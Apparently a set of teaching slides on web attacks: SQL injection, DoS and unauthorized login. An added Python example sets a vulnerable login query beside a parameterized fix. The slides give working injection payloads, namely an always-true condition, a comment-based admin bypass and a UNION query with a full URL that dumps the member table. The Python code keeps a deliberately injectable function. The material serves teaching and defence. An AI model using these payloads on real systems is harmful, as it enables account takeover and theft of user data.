3. SQL INJECTION
How can the WHERE clause of this query be made to always evaluate to true?
SELECT * FROM member WHERE id = '$user_id' AND password = '$user_pass'
How about this?
SELECT * FROM member WHERE id = 'user' AND pass = '' OR '' = ''
SELECT * FROM member WHERE id = 'admin' --' AND pass = 'dummy'
Manipulating part of an SQL query like this is called an SQL Injection attack
4. DoS ATTACK
DoS Attack: Denial of Service Attack
What if the bulletin board could no longer be viewed?
What if the server could no longer be accessed?
An even worse attack is the DDoS attack
Distributed Denial of Service Attack
8. UNAUTHORIZED LOGIN
Copy-paste of the earlier one
Change
SELECT * FROM member WHERE id = '$user_id' AND password = '$user_pass'
into
SELECT * FROM member WHERE id = 'user' AND pass = '' OR '' = ''
or
SELECT * FROM member WHERE id = 'admin' --' AND pass = 'dummy'
12. RETRIEVING MEMBER INFORMATION
Use the SQL UNION clause
SELECT * FROM board WHERE id = $post_id
SELECT * FROM board WHERE id = 0 UNION ALL SELECT *, '', '', '', '', '' from member
http://yourserver/view.php?post_id=1 UNION ALL SELECT *, '', '', '', '', '' from member LIMIT 0, 1
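Added example (not from the original slides): the login query from slides 3 and 8 built by string interpolation, next to a parameterized version, plus a bound integer parameter for the post_id query from slide 12. The function names, the constructed in-memory SQLite tables and the choice of Python are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory tables named after the slides' member and board."""
    db = sqlite3.connect(":memory:")
    # Plaintext password only to mirror the slide's query; store hashes in practice.
    db.execute("CREATE TABLE member (id TEXT, password TEXT)")
    db.execute("INSERT INTO member VALUES ('admin', 's3cret-constructed')")
    db.execute("CREATE TABLE board (id INTEGER, title TEXT)")
    db.execute("INSERT INTO board VALUES (1, 'hello')")
    return db

def login_vulnerable(db, user_id, user_pass):
    # Same construction as the slide: input is pasted into the SQL text,
    # so a quote or -- in the input changes the structure of the WHERE clause.
    sql = ("SELECT * FROM member WHERE id = '%s' AND password = '%s'"
           % (user_id, user_pass))
    return db.execute(sql).fetchone() is not None

def login_safe(db, user_id, user_pass):
    # Placeholders send the input as data; it is never parsed as SQL.
    sql = "SELECT * FROM member WHERE id = ? AND password = ?"
    return db.execute(sql, (user_id, user_pass)).fetchone() is not None

def view_post_safe(db, post_id):
    # Numeric parameter: int() raises ValueError on anything but an integer,
    # and the value is still bound rather than concatenated.
    pid = int(post_id)
    return db.execute("SELECT * FROM board WHERE id = ?", (pid,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # The two inputs shown on the slides.
    for uid, pw in [("user", "' OR '' = '"), ("admin' --", "dummy")]:
        print(repr(uid), repr(pw),
              "vulnerable:", login_vulnerable(db, uid, pw),
              "safe:", login_safe(db, uid, pw))
    print(view_post_safe(db, "1"))
```
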